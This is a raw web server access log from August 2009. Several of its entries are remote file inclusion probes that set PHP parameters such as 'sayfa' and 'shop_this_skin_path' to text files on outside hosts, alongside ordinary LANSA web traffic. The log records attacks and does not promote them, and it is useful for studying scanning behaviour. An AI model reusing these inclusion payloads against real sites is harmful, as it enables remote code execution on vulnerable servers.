218.145.160.123 - - [05/Aug/2009:09:34:55 -0400] "GET /logs/access_log.Q109071100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hongilsys.co.kr/tops/temp/idus.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
60.251.217.4 - - [05/Aug/2009:09:34:57 -0400] "GET /logs//main.php?sayfa=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
74.215.164.238 - - [05/Aug/2009:09:35:00 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L019607454F55C600A393073+M37+ENG HTTP/1.1" 200 40488 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13"
60.251.217.4 - - [05/Aug/2009:09:35:02 -0400] "GET //main.php?sayfa=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
60.251.217.4 - - [05/Aug/2009:09:35:02 -0400] "GET /logs/access_log.Q109072900//main.php?sayfa=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.215.164.238 - - [05/Aug/2009:09:35:06 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13"
74.215.164.238 - - [05/Aug/2009:09:35:15 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0196074746753600C353073+M37+ENG HTTP/1.1" 200 57417 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13"
60.251.217.4 - - [05/Aug/2009:09:35:20 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 234 "-"